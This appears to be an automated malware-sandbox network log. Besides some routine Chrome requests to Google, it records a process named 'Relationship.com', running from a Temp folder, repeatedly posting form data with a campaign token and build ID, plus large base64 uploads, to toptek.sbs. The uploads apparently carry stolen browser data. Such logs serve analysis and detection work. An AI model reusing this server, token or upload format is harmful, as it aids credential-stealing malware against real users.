                                                                                                                                                                                                                                                                          Data Ascii: Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"stri
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30
                                                                                                                                                                                                                                                                          Data Ascii: _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.ee\u00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 142.250.181.68 | 443 | 1312 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:50 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-22 21:47:51 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Sun, 22 Dec 2024 21:47:50 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-22 21:47:51 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-22 21:47:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:54 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:47:54 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74
Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCJMOPPPH4EUAIEK6PHLCont
2024-12-22 21:47:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:47:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:47:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49766 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:56 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6FUKNYC2NGV3E3OH4ECJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:47:56 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74
Data Ascii: ------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------6FUKNYC2NGV3E3OH4ECJCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-22 21:47:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:47:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49768 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:58 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6FUKNYC2NGV3E3OH4ECJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:47:58 UTC | 16355 | OUT | Data Ascii:
------6FUKNYC2NGV3E3OH4ECJ
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------6FUKNYC2NGV3E3OH4ECJ
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------6FUKNYC2NGV3E3OH4ECJ
Cont
2024-12-22 21:47:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:47:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:47:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49775 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:00 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JE3OPZM79H47QI589ZCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:00 UTC | 16355 | OUT | Data Ascii:
------JE3OPZM79H47QI589ZCB
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------JE3OPZM79H47QI589ZCB
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------JE3OPZM79H47QI589ZCB
Cont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
